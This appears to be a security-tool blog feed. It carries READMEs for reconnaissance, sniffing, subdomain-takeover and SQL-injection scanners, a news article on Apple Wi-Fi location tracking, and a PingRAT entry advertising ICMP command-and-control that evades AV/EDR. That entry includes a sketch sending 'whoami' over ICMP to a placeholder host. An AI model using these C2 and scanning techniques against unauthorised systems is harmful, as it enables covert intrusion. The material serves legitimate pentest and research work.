    74 function-init-state Function initializing state variables Informational High
    75 incorrect-using-for Detects using-for statement usage when no function from a given library matches a given type Informational High
    76 low-level-calls Low level calls Informational High
    77 missing-inheritance Missing inheritance Informational High
    78 naming-convention Conformity to Solidity naming conventions Informational High
    79 pragma If different pragma directives are used Informational High
    80 redundant-statements Redundant statements Informational High
    81 solc-version Incorrect Solidity version Informational High
    82 unimplemented-functions Unimplemented functions Informational High
    83 unused-import Detects unused imports Informational High
    84 unused-state Unused state variables Informational High
    85 costly-loop Costly operations in a loop Informational Medium
    86 dead-code Functions that are not used Informational Medium
    87 reentrancy-unlimited-gas Reentrancy vulnerabilities through send and transfer Informational Medium
    88 similar-names Variable names are too similar Informational Medium
    89 too-many-digits Conformance to numeric notation best practices Informational Medium
    90 cache-array-length Detects for loops that use length member of some storage array in their loop condition and don't modify it. Optimization High
    91 constable-states State variables that could be declared constant Optimization High
    92 external-function Public function that could be declared external Optimization High
    93 immutable-states State variables that could be declared immutable Optimization High
    94 var-read-using-this Contract reads its own variable using this Optimization High


    Domainim - A Fast And Comprehensive Tool For Organizational Network Scanning

    By: Zion3R


    Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.


    Features

Current features (v1.0.1):

• Subdomain enumeration (2 engines + bruteforcing)
• User-friendly output
• Resolving A records (IPv4)


    • Virtual hostname enumeration
    • Reverse DNS lookup


    • Detects wildcard subdomains (for bruteforcing)


    • Basic TCP port scanning
    • Subdomains are accepted as input


    • Export results to JSON file


    A few features are work in progress. See Planned features for more details.

    The project is inspired by Sublist3r. The port scanner module is heavily based on NimScan.

    Installation

You can build this repo from source:

• Clone the repository

    git clone git@github.com:pptx704/domainim
    • Build the binary
    nimble build
    • Run the binary
    ./domainim <domain> [--ports=<ports>]

    Or, you can just download the binary from the release page. Keep in mind that the binary is tested on Debian based systems only.

    Usage

./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | -l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    • <domain> is the domain to be enumerated. It can be a subdomain as well.
• --ports | -p is a string specification of the ports to be scanned. It can be one of the following-
    • all - Scan all ports (1-65535)
    • none - Skip port scanning (default)
• t<n> - Scan the top n ports (same as nmap), e.g. t100 scans the top 100 ports. The maximum value is 5000; if n is greater than 5000, it will be set to 5000.
• single value - Scan a single port, e.g. 80 scans port 80
• range value - Scan a range of ports, e.g. 80-100 scans ports 80 to 100
• comma separated values - Scan multiple ports, e.g. 80,443,8080 scans ports 80, 443 and 8080
• combination - Scan a combination of the above, e.g. 80,443,8080-8090,t500 scans ports 80, 443, 8080 to 8090 and the top 500 ports
    • --dns | -d is the address of the dns server. This should be a valid IPv4 address and can optionally contain the port number-
    • a.b.c.d - Use DNS server at a.b.c.d on port 53
• a.b.c.d#n - Use DNS server at a.b.c.d on port n
    • --wordlist | -l - Path to the wordlist file. This is used for bruteforcing subdomains. If the file is invalid, bruteforcing will be skipped. You can get a wordlist from SecLists. A wordlist is also provided in the release page.
• --rps | -r - Number of requests to be made per second during bruteforcing. The default value is 1024 req/s. Note that DNS queries are made in batches, and the next batch starts only after the previous one completes. Since queries can be rate limited, increasing the value does not always guarantee faster results.
    • --out | -o - Path to the output file. The output will be saved in JSON format. The filename must end with .json.

Examples:
• ./domainim nmap.org --ports=all
• ./domainim google.com --ports=none --dns=8.8.8.8#53
• ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
• ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --out=results.json
• ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

    The help menu can be accessed using ./domainim --help or ./domainim -h.

    Usage:
domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | -l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    domainim (-h | --help)

    Options:
    -h, --help Show this screen.
    -p, --ports Ports to scan. [default: `none`]
    Can be `all`, `none`, `t<n>`, single value, range value, combination
    -l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
    -d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
    -r, --rps DNS queries to be made per second [default: 1024 req/s]
    -o, --out JSON file where the output will be saved. Filename must end with `.json`

    Examples:
domainim domainim.com -p:t500 -l:wordlist.txt --dns=1.1.1.1#53 --out=results.json
domainim sub.domainim.com --ports=all --dns=8.8.8.8 -r:1500 -o:results.json

    The JSON schema for the results is as follows-

[
    {
        "subdomain": string,
        "data": [
            {
                "ipv4": string,
                "vhosts": [string],
                "reverse_dns": string,
                "ports": [int]
            }
        ]
    }
]

    Example json for nmap.org can be found here.
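Since the output is plain JSON, post-processing is straightforward. Below is a minimal Python sketch that summarizes a results file, assuming the schema above; the file name is only an example.

# Summarize a Domainim JSON result file (schema as shown above).
import json
import sys

def summarize(path: str) -> None:
    with open(path) as fh:
        results = json.load(fh)
    for entry in results:
        print(entry["subdomain"])
        for record in entry.get("data", []):
            ports = ",".join(str(p) for p in record.get("ports", [])) or "-"
            rdns = record.get("reverse_dns") or "-"
            print(f"  {record['ipv4']}  rDNS={rdns}  ports={ports}")

if __name__ == "__main__":
    summarize(sys.argv[1] if len(sys.argv) > 1 else "results.json")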

    Contributing

    Contributions are welcome. Feel free to open a pull request or an issue.

    Planned Features

    • [x] TCP port scanning
    • [ ] UDP port scanning support
    • [ ] Resolve AAAA records (IPv6)
    • [x] Custom DNS server
    • [x] Add bruteforcing subdomains using a wordlist
    • [ ] Force bruteforcing (even if wildcard subdomain is found)
    • [ ] Add more engines for subdomain enumeration
    • [x] File output (JSON)
    • [ ] Multiple domain enumeration
    • [ ] Dir and File busting

    Others

    • [x] Update verbose output when encountering errors (v0.2.0)
    • [x] Show progress bar for longer operations
    • [ ] Add individual port scan progress bar
    • [ ] Add tests
    • [ ] Add comments and docstrings

    Additional Notes

    This project is still in its early stages. There are several limitations I am aware of.

The two engines I am using (I'm calling them engines because Sublist3r does so) currently have some sort of response limit. dnsdumpster can fetch up to 100 subdomains. crt.sh also randomizes the results when there are too many. Another issue with crt.sh is that it sometimes returns an SQL error, so for some domains the results can differ between runs. I am planning to add more engines in the future (at least a brute-force engine).

The port scanner uses a timeout of only the ping response time + 750ms. This might lead to false negatives. Since Domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).

It might seem that the way vhostnames are printed just brings repetition to the table.


Printing them as follows might have been better-

ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scanme.nmap.org, svn.nmap.org, www.nmap.org
    ↳ 45.33.49.119
    ↳ Reverse DNS: ack.nmap.org.

But while testing, I found cases where not all IPs are shared by the same set of vhostnames. That is why I decided to keep it this way.


The DNS server might have some sort of rate limiting. That's why I added random delays (between 0-300ms) per query for IPv4 resolving, so the DNS server doesn't get all the queries at once but rather in a more natural way. For the bruteforcing method, the delay is between 0-1000ms by default, but that can be changed using the --rps | -r flag.

One particular limitation that is bugging me is that the DNS resolver does not return all the IPs for a domain, so it is necessary to make multiple queries to get all (or most) of them. But then again, it is not possible to know how many IPs there are for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records, so if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author on this.

For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing would resolve IPv4 for every candidate subdomain. However, skipping bruteforce also skips valid subdomains (e.g. scanme.nmap.org will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.
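For reference, the wildcard check itself is simple. A minimal Python sketch of the idea (not Domainim's Nim code): if a clearly nonexistent random label resolves, the domain likely has a wildcard record and bruteforce results cannot be trusted.

# Wildcard-detection concept sketch (not Domainim's implementation).
import random
import socket
import string

def has_wildcard(domain: str) -> bool:
    # A 20-character random label is practically guaranteed not to exist.
    label = "".join(random.choices(string.ascii_lowercase + string.digits, k=20))
    try:
        socket.gethostbyname(f"{label}.{domain}")
        return True        # the random name resolved, so a wildcard record exists
    except socket.gaierror:
        return False

print(has_wildcard("nmap.org"))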

A similar thing is true for vhost enumeration with subdomain inputs. Since only URLs that end with the given subdomain are returned, subdomains of sibling domains are not considered. For example, scanme.nmap.org will not be printed for ack.nmap.org, but something.ack.nmap.org might be. I could search for all subdomains of nmap.org, but that defeats the purpose of having a subdomain as input.

    License

    MIT License. See LICENSE for full text.



    Above - Invisible Network Protocol Sniffer

    By: Zion3R


    Invisible protocol sniffer for finding vulnerabilities in the network. Designed for pentesters and security engineers.


    Above: Invisible network protocol sniffer
    Designed for pentesters and security engineers

    Author: Magama Bazarov, <caster@exploit.org>
    Pseudonym: Caster
    Version: 2.6
    Codename: Introvert

    Disclaimer

    All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any illegal use of this tool.

    It is a specialized network security tool that helps both pentesters and security professionals.

    Mechanics

Above is an invisible network sniffer for finding vulnerabilities in network equipment. It is based entirely on passive network traffic analysis, so it makes no noise on the air. It's invisible. It is built completely on the Scapy library.

Above allows pentesters to automate the process of finding vulnerabilities in network hardware: discovery protocols, dynamic routing, 802.1Q, ICS protocols, FHRP, STP, LLMNR/NBT-NS, etc.

    Supported protocols

    Detects up to 27 protocols:

MACSec (802.1AE)
    EAPOL (Checking 802.1X versions)
    ARP (Passive ARP, Host Discovery)
    CDP (Cisco Discovery Protocol)
    DTP (Dynamic Trunking Protocol)
    LLDP (Link Layer Discovery Protocol)
    802.1Q Tags (VLAN)
    S7COMM (Siemens)
    OMRON
    TACACS+ (Terminal Access Controller Access Control System Plus)
    ModbusTCP
    STP (Spanning Tree Protocol)
    OSPF (Open Shortest Path First)
    EIGRP (Enhanced Interior Gateway Routing Protocol)
    BGP (Border Gateway Protocol)
    VRRP (Virtual Router Redundancy Protocol)
HSRP (Hot Standby Router Protocol)
    GLBP (Gateway Load Balancing Protocol)
    IGMP (Internet Group Management Protocol)
    LLMNR (Link Local Multicast Name Resolution)
    NBT-NS (NetBIOS Name Service)
    MDNS (Multicast DNS)
    DHCP (Dynamic Host Configuration Protocol)
    DHCPv6 (Dynamic Host Configuration Protocol v6)
    ICMPv6 (Internet Control Message Protocol v6)
    SSDP (Simple Service Discovery Protocol)
    MNDP (MikroTik Neighbor Discovery Protocol)

    Operating Mechanism

    Above works in two modes:

• Hot mode: Sniffing on your interface, optionally with a timer
    • Cold mode: Analyzing traffic dumps

    The tool is very simple in its operation and is driven by arguments:

    • Interface: Specifying the network interface on which sniffing will be performed
    • Timer: Time during which traffic analysis will be performed
    • Input: The tool takes an already prepared .pcap as input and looks for protocols in it
• Output: Above records the captured traffic to a .pcap file whose name you specify
• Passive ARP: Detecting hosts in a segment using Passive ARP

usage: above.py [-h] [--interface INTERFACE] [--timer TIMER] [--output OUTPUT] [--input INPUT] [--passive-arp]

    options:
    -h, --help show this help message and exit
    --interface INTERFACE
    Interface for traffic listening
    --timer TIMER Time in seconds to capture packets, if not set capture runs indefinitely
    --output OUTPUT File name where the traffic will be recorded
    --input INPUT File name of the traffic dump
    --passive-arp Passive ARP (Host Discovery)

    Information about protocols

The information obtained is useful not only to the pentester but also to the security engineer, who will know what to pay attention to.

    When Above detects a protocol, it outputs the necessary information to indicate the attack vector or security issue:

    • Impact: What kind of attack can be performed on this protocol;

    • Tools: What tool can be used to launch an attack;

    • Technical information: Required information for the pentester, sender MAC/IP addresses, FHRP group IDs, OSPF/EIGRP domains, etc.

    • Mitigation: Recommendations for fixing the security problems

• Source/Destination Addresses: For each protocol, Above displays the source and destination MAC and IP addresses


    Installation

    Linux

    You can install Above directly from the Kali Linux repositories

    caster@kali:~$ sudo apt update && sudo apt install above

    Or...

    caster@kali:~$ sudo apt-get install python3-scapy python3-colorama python3-setuptools
    caster@kali:~$ git clone https://github.com/casterbyte/Above
    caster@kali:~$ cd Above/
    caster@kali:~/Above$ sudo python3 setup.py install

    macOS:

    # Install python3 first
    brew install python3
    # Then install required dependencies
    sudo pip3 install scapy colorama setuptools

    # Clone the repo
    git clone https://github.com/casterbyte/Above
    cd Above/
    sudo python3 setup.py install

    Don't forget to deactivate your firewall on macOS!

    Settings > Network > Firewall


    How to Use

    Hot mode

    Above requires root access for sniffing

    Above can be run with or without a timer:

    caster@kali:~$ sudo above --interface eth0 --timer 120

To stop traffic sniffing, press CTRL + C

WARNING! Above is not designed to work with tunnel interfaces (L3) due to the use of filters for L2 protocols. The tool may not work properly on tunneled L3 interfaces.

    Example:

    caster@kali:~$ sudo above --interface eth0 --timer 120

    -----------------------------------------------------------------------------------------
    [+] Start sniffing...

    [*] After the protocol is detected - all necessary information about it will be displayed
    --------------------------------------------------
    [+] Detected SSDP Packet
    [*] Attack Impact: Potential for UPnP Device Exploitation
    [*] Tools: evil-ssdp
    [*] SSDP Source IP: 192.168.0.251
    [*] SSDP Source MAC: 02:10:de:64:f2:34
    [*] Mitigation: Ensure UPnP is disabled on all devices unless absolutely necessary, monitor UPnP traffic
    --------------------------------------------------
    [+] Detected MDNS Packet
    [*] Attack Impact: MDNS Spoofing, Credentials Interception
    [*] Tools: Responder
    [*] MDNS Spoofing works specifically against Windows machines
    [*] You cannot get NetNTLMv2-SSP from Apple devices
    [*] MDNS Speaker IP: fe80::183f:301c:27bd:543
    [*] MDNS Speaker MAC: 02:10:de:64:f2:34
    [*] Mitigation: Filter MDNS traffic. Be careful with MDNS filtering
    --------------------------------------------------

    If you need to record the sniffed traffic, use the --output argument

    caster@kali:~$ sudo above --interface eth0 --timer 120 --output above.pcap

    If you interrupt the tool with CTRL+C, the traffic is still written to the file

    Cold mode

    If you already have some recorded traffic, you can use the --input argument to look for potential security issues

    caster@kali:~$ above --input ospf-md5.cap

    Example:

    caster@kali:~$ sudo above --input ospf-md5.cap

    [+] Analyzing pcap file...

    --------------------------------------------------
    [+] Detected OSPF Packet
    [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
    [*] Tools: Loki, Scapy, FRRouting
    [*] OSPF Area ID: 0.0.0.0
    [*] OSPF Neighbor IP: 10.0.0.1
    [*] OSPF Neighbor MAC: 00:0c:29:dd:4c:54
    [!] Authentication: MD5
    [*] Tools for bruteforce: Ettercap, John the Ripper
    [*] OSPF Key ID: 1
    [*] Mitigation: Enable passive interfaces, use authentication
    --------------------------------------------------
    [+] Detected OSPF Packet
    [+] Attack Impact: Subnets Discovery, Blackhole, Evil Twin
    [*] Tools: Loki, Scapy, FRRouting
    [*] OSPF Area ID: 0.0.0.0
    [*] OSPF Neighbor IP: 192.168.0.2
    [*] OSPF Neighbor MAC: 00:0c:29:43:7b:fb
    [!] Authentication: MD5
    [*] Tools for bruteforce: Ettercap, John the Ripper
    [*] OSPF Key ID: 1
    [*] Mitigation: Enable passive interfaces, use authentication

    Passive ARP

    The tool can detect hosts without noise in the air by processing ARP frames in passive mode

    caster@kali:~$ sudo above --interface eth0 --passive-arp --timer 10

    [+] Host discovery using Passive ARP

    --------------------------------------------------
    [+] Detected ARP Reply
    [*] ARP Reply for IP: 192.168.1.88
    [*] MAC Address: 00:00:0c:07:ac:c8
    --------------------------------------------------
    [+] Detected ARP Reply
    [*] ARP Reply for IP: 192.168.1.40
    [*] MAC Address: 00:0c:29:c5:82:81
    --------------------------------------------------
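The passive ARP technique itself is easy to reproduce for testing. Here is a minimal Scapy sketch (not Above's code) that listens for ARP replies without sending a single frame; the interface name and timer are placeholders.

# Passive ARP host-discovery sketch: record IP/MAC pairs from ARP replies.
from scapy.all import sniff, ARP   # pip install scapy; requires root privileges

def on_packet(pkt):
    if pkt.haslayer(ARP) and pkt[ARP].op == 2:   # op 2 = is-at (ARP reply)
        print(f"[+] ARP Reply: {pkt[ARP].psrc} is at {pkt[ARP].hwsrc}")

# store=False keeps memory usage flat; timeout mirrors the --timer argument
sniff(iface="eth0", filter="arp", prn=on_packet, store=False, timeout=10)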

    Outro

    I wrote this tool because of the track "A View From Above (Remix)" by KOAN Sound. This track was everything to me when I was working on this sniffer.




    Why Your Wi-Fi Router Doubles as an Apple AirTag

    Image: Shutterstock.

    Apple and the satellite-based broadband service Starlink each recently took steps to address new research into the potential security and privacy implications of how their services geo-locate devices. Researchers from the University of Maryland say they relied on publicly available data from Apple to track the location of billions of devices globally — including non-Apple devices like Starlink systems — and found they could use this data to monitor the destruction of Gaza, as well as the movements and in many cases identities of Russian and Ukrainian troops.

    At issue is the way that Apple collects and publicly shares information about the precise location of all Wi-Fi access points seen by its devices. Apple collects this location data to give Apple devices a crowdsourced, low-power alternative to constantly requesting global positioning system (GPS) coordinates.

    Both Apple and Google operate their own Wi-Fi-based Positioning Systems (WPS) that obtain certain hardware identifiers from all wireless access points that come within range of their mobile devices. Both record the Media Access Control (MAC) address that a Wi-FI access point uses, known as a Basic Service Set Identifier or BSSID.

    Periodically, Apple and Google mobile devices will forward their locations — by querying GPS and/or by using cellular towers as landmarks — along with any nearby BSSIDs. This combination of data allows Apple and Google devices to figure out where they are within a few feet or meters, and it’s what allows your mobile phone to continue displaying your planned route even when the device can’t get a fix on GPS.

    With Google’s WPS, a wireless device submits a list of nearby Wi-Fi access point BSSIDs and their signal strengths — via an application programming interface (API) request to Google — whose WPS responds with the device’s computed position. Google’s WPS requires at least two BSSIDs to calculate a device’s approximate position.

Apple’s WPS also accepts a list of nearby BSSIDs, but instead of computing the device’s location based off the set of observed access points and their received signal strengths and then reporting that result to the user, Apple’s API will return the geolocations of up to 400 more BSSIDs that are near the one requested. It then uses approximately eight of those BSSIDs to work out the user’s location based on known landmarks.

    In essence, Google’s WPS computes the user’s location and shares it with the device. Apple’s WPS gives its devices a large enough amount of data about the location of known access points in the area that the devices can do that estimation on their own.

    That’s according to two researchers at the University of Maryland, who theorized they could use the verbosity of Apple’s API to map the movement of individual devices into and out of virtually any defined area of the world. The UMD pair said they spent a month early in their research continuously querying the API, asking it for the location of more than a billion BSSIDs generated at random.

    They learned that while only about three million of those randomly generated BSSIDs were known to Apple’s Wi-Fi geolocation API, Apple also returned an additional 488 million BSSID locations already stored in its WPS from other lookups.

    UMD Associate Professor David Levin and Ph.D student Erik Rye found they could mostly avoid requesting unallocated BSSIDs by consulting the list of BSSID ranges assigned to specific device manufacturers. That list is maintained by the Institute of Electrical and Electronics Engineers (IEEE), which is also sponsoring the privacy and security conference where Rye is slated to present the UMD research later today.

    Plotting the locations returned by Apple’s WPS between November 2022 and November 2023, Levin and Rye saw they had a near global view of the locations tied to more than two billion Wi-Fi access points. The map showed geolocated access points in nearly every corner of the globe, apart from almost the entirety of China, vast stretches of desert wilderness in central Australia and Africa, and deep in the rainforests of South America.

    A “heatmap” of BSSIDs the UMD team said they discovered by guessing randomly at BSSIDs.

    The researchers said that by zeroing in on or “geofencing” other smaller regions indexed by Apple’s location API, they could monitor how Wi-Fi access points moved over time. Why might that be a big deal? They found that by geofencing active conflict zones in Ukraine, they were able to determine the location and movement of Starlink devices used by both Ukrainian and Russian forces.

    The reason they were able to do that is that each Starlink terminal — the dish and associated hardware that allows a Starlink customer to receive Internet service from a constellation of orbiting Starlink satellites — includes its own Wi-Fi access point, whose location is going to be automatically indexed by any nearby Apple devices that have location services enabled.

    A heatmap of Starlink routers in Ukraine. Image: UMD.

    The University of Maryland team geo-fenced various conflict zones in Ukraine, and identified at least 3,722 Starlink terminals geolocated in Ukraine.

    “We find what appear to be personal devices being brought by military personnel into war zones, exposing pre-deployment sites and military positions,” the researchers wrote. “Our results also show individuals who have left Ukraine to a wide range of countries, validating public reports of where Ukrainian refugees have resettled.”

    In an interview with KrebsOnSecurity, the UMD team said they found that in addition to exposing Russian troop pre-deployment sites, the location data made it easy to see where devices in contested regions originated from.

    “This includes residential addresses throughout the world,” Levin said. “We even believe we can identify people who have joined the Ukraine Foreign Legion.”

    A simplified map of where BSSIDs that enter the Donbas and Crimea regions of Ukraine originate. Image: UMD.

    Levin and Rye said they shared their findings with Starlink in March 2024, and that Starlink told them the company began shipping software updates in 2023 that force Starlink access points to randomize their BSSIDs.

    Starlink’s parent SpaceX did not respond to requests for comment. But the researchers shared a graphic they said was created from their Starlink BSSID monitoring data, which shows that just in the past month there was a substantial drop in the number of Starlink devices that were geo-locatable using Apple’s API.

    UMD researchers shared this graphic, which shows their ability to monitor the location and movement of Starlink devices by BSSID dropped precipitously in the past month.

    They also shared a written statement they received from Starlink, which acknowledged that Starlink User Terminal routers originally used a static BSSID/MAC:

    “In early 2023 a software update was released that randomized the main router BSSID. Subsequent software releases have included randomization of the BSSID of WiFi repeaters associated with the main router. Software updates that include the repeater randomization functionality are currently being deployed fleet-wide on a region-by-region basis. We believe the data outlined in your paper is based on Starlink main routers and or repeaters that were queried prior to receiving these randomization updates.”

    The researchers also focused their geofencing on the Israel-Hamas war in Gaza, and were able to track the migration and disappearance of devices throughout the Gaza Strip as Israeli forces cut power to the country and bombing campaigns knocked out key infrastructure.

    “As time progressed, the number of Gazan BSSIDs that are geolocatable continued to decline,” they wrote. “By the end of the month, only 28% of the original BSSIDs were still found in the Apple WPS.”

    In late March 2024, Apple quietly updated its website to note that anyone can opt out of having the location of their wireless access points collected and shared by Apple — by appending “_nomap” to the end of the Wi-Fi access point’s name (SSID). Adding “_nomap” to your Wi-Fi network name also blocks Google from indexing its location.

    Apple updated its privacy and location services policy in March 2024 to allow people to opt out of having their Wi-Fi access point indexed by its service, by appending “_nomap” to the network’s name.

    Asked about the changes, Apple said they have respected the “_nomap” flag on SSIDs for some time, but that this was only called out in a support article earlier this year.

    Rye said Apple’s response addressed the most depressing aspect of their research: That there was previously no way for anyone to opt out of this data collection.

    “You may not have Apple products, but if you have an access point and someone near you owns an Apple device, your BSSID will be in [Apple’s] database,” he said. “What’s important to note here is that every access point is being tracked, without opting in, whether they run an Apple device or not. Only after we disclosed this to Apple have they added the ability for people to opt out.”

    The researchers said they hope Apple will consider additional safeguards, such as proactive ways to limit abuses of its location API.

    “It’s a good first step,” Levin said of Apple’s privacy update in March. “But this data represents a really serious privacy vulnerability. I would hope Apple would put further restrictions on the use of its API, like rate-limiting these queries to keep people from accumulating massive amounts of data like we did.”

    The UMD researchers said they omitted certain details from their study to protect the users they were able to track, noting that the methods they used could present risks for those fleeing abusive relationships or stalkers.

    “We observe routers move between cities and countries, potentially representing their owner’s relocation or a business transaction between an old and new owner,” they wrote. “While there is not necessarily a 1-to-1 relationship between Wi-Fi routers and users, home routers typically only have several. If these users are vulnerable populations, such as those fleeing intimate partner violence or a stalker, their router simply being online can disclose their new location.”

    The researchers said Wi-Fi access points that can be created using a mobile device’s built-in cellular modem do not create a location privacy risk for their users because mobile phone hotspots will choose a random BSSID when activated.

    “Modern Android and iOS devices will choose a random BSSID when you go into hotspot mode,” he said. “Hotspots are already implementing the strongest recommendations for privacy protections. It’s other types of devices that don’t do that.”

    For example, they discovered that certain commonly used travel routers compound the potential privacy risks.

    “Because travel routers are frequently used on campers or boats, we see a significant number of them move between campgrounds, RV parks, and marinas,” the UMD duo wrote. “They are used by vacationers who move between residential dwellings and hotels. We have evidence of their use by military members as they deploy from their homes and bases to war zones.”

    A copy of the UMD research is available here (PDF).

    Update, May 22, 4:54 p.m. ET: Added response from Apple.

    Five Core Tenets Of Highly Effective DevSecOps Practices

    One of the enduring challenges of building modern applications is to make them more secure without disrupting high-velocity DevOps processes or degrading the developer experience. Today’s cyber threat landscape is rife with sophisticated attacks aimed at all different parts of the software supply chain and the urgency for software-producing organizations to adopt DevSecOps practices that deeply

    Subhunter - A Fast Subdomain Takeover Tool

    By: Zion3R


Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. Typically, this happens when the subdomain has a CNAME record in DNS, but no host is providing content for it. Subhunter takes a given list of subdomains and scans them to check for this vulnerability.
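Conceptually, the check boils down to finding a dangling CNAME plus a provider-specific "unclaimed" signature. A minimal Python sketch of that idea follows (not Subhunter's Go implementation; the fingerprint strings and test subdomain are illustrative only).

# Dangling-CNAME concept sketch. Real scanners use curated fingerprint lists
# such as can-i-take-over-xyz; the two strings below are only examples.
import dns.exception
import dns.resolver          # pip install dnspython
import requests              # pip install requests

FINGERPRINTS = ["NoSuchBucket", "There isn't a GitHub Pages site here"]

def check(subdomain: str) -> str:
    try:
        cname = dns.resolver.resolve(subdomain, "CNAME")[0].target.to_text()
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer,
            dns.resolver.NoNameservers, dns.exception.Timeout):
        return "no CNAME"
    try:
        body = requests.get(f"http://{subdomain}", timeout=10).text
    except requests.RequestException:
        return f"CNAME {cname}: target unreachable (review manually)"
    if any(fp in body for fp in FINGERPRINTS):
        return f"CNAME {cname}: possible takeover"
    return f"CNAME {cname}: not vulnerable"

print(check("sub.example.com"))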


    Features:

    • Auto update
    • Uses random user agents
    • Built in Go
    • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

    Installation:

    Option 1:

    Download from releases

    Option 2:

    Build from source:

    $ git clone https://github.com/Nemesis0U/Subhunter.git
    $ go build subhunter.go

    Usage:

    Options:

    Usage of subhunter:
    -l string
    File including a list of hosts to scan
    -o string
    File to save results
    -t int
    Number of threads for scanning (default 50)
    -timeout int
    Timeout in seconds (default 20)

    Demo (Added fake fingerprint for POC):

    ./Subhunter -l subdomains.txt -o test.txt

    ____ _ _ _
    / ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
    \___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
    ___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
    |____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


    A fast subdomain takeover tool

    Created by Nemesis

    Loaded 88 fingerprints for current scan

    -----------------------------------------------------------------------------

    [+] Nothing found at www.ubereats.com: Not Vulnerable
    [+] Nothing found at testauth.ubereats.com: Not Vulnerable
    [+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
    [+] Nothing found at about.ubereats.com: Not Vulnerable
    [+] Nothing found at beta.ubereats.com: Not Vulnerable
    [+] Nothing found at ewp.ubereats.com: Not Vulnerable
[+] Nothing found at edgetest.ubereats.com: Not Vulnerable
    [+] Nothing found at guest.ubereats.com: Not Vulnerable
    [+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
    [+] Nothing found at info.ubereats.com: Not Vulnerable
    [+] Nothing found at learn.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants.ubereats.com: Not Vulnerable
    [+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
    [+] Nothing found at messages.ubereats.com: Not Vulnerable
    [+] Nothing found at order.ubereats.com: Not Vulnerable
    [+] Nothing found at restaurants.ubereats.com: Not Vulnerable
    [+] Nothing found at payments.ubereats.com: Not Vulnerable
    [+] Nothing found at static.ubereats.com: Not Vulnerable

    Subhunter exiting...
    Results written to test.txt




    PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

    By: Zion3R


    PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

    Features:

    • Uses ICMP for Command and Control
    • Undetectable by most AV/EDR solutions
    • Written in Go

    Installation:

    Download the binaries

    or build the binaries and you are ready to go:

    $ git clone https://github.com/Nemesis0U/PingRAT.git
    $ go build client.go
    $ go build server.go

    Usage:

    Server:

    ./server -h
    Usage of ./server:
    -d string
    Destination IP address
    -i string
    Listener (virtual) Network Interface (e.g. eth0)

    Client:

    ./client -h
    Usage of ./client:
    -d string
    Destination IP address
    -i string
    (Virtual) Network Interface (e.g., eth0)
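PingRAT's own wire format is not documented here, but the underlying idea of tunneling data in ICMP is simple to illustrate. A minimal Scapy sketch that carries a string in an ICMP Echo Request payload and reads the peer's reply payload; the destination is a placeholder documentation address, and this is a generic illustration, not PingRAT's protocol.

# Generic data-over-ICMP illustration: the payload rides inside an Echo Request.
from scapy.all import IP, ICMP, Raw, sr1   # pip install scapy; requires root

def icmp_exchange(dst, data):
    pkt = IP(dst=dst) / ICMP(type=8) / Raw(load=data)   # type 8 = echo request
    reply = sr1(pkt, timeout=3, verbose=False)
    if reply is not None and reply.haslayer(Raw):
        return bytes(reply[Raw].load)                   # peer's answer payload
    return None

print(icmp_exchange("192.0.2.10", b"whoami"))   # 192.0.2.10 is a placeholder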



    SQLMC - Check All Urls Of A Domain For SQL Injections

    By: Zion3R


    SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

    Features

    • Scans a domain for SQL injection vulnerabilities
    • Crawls the given URL up to a specified depth
    • Checks each link for SQL injection vulnerabilities
    • Reports vulnerabilities along with server information and depth

    Installation

1. Install the required dependencies: pip3 install sqlmc

    Usage

    Run sqlmc with the following command-line arguments:

    • -u, --url: The URL to scan (required)
    • -d, --depth: The depth to scan (required)
    • -o, --output: The output file to save the results

    Example usage:

    sqlmc -u http://example.com -d 2

Replace http://example.com with the URL you want to scan and 2 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

    The tool will then perform the scan and display the results.
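SQLMC's exact detection logic is not spelled out here, but a naive error-based probe of the kind such scanners commonly use looks like the following Python sketch; the error signatures and target URL are illustrative assumptions.

# Naive error-based SQL injection probe: append a quote to each GET parameter
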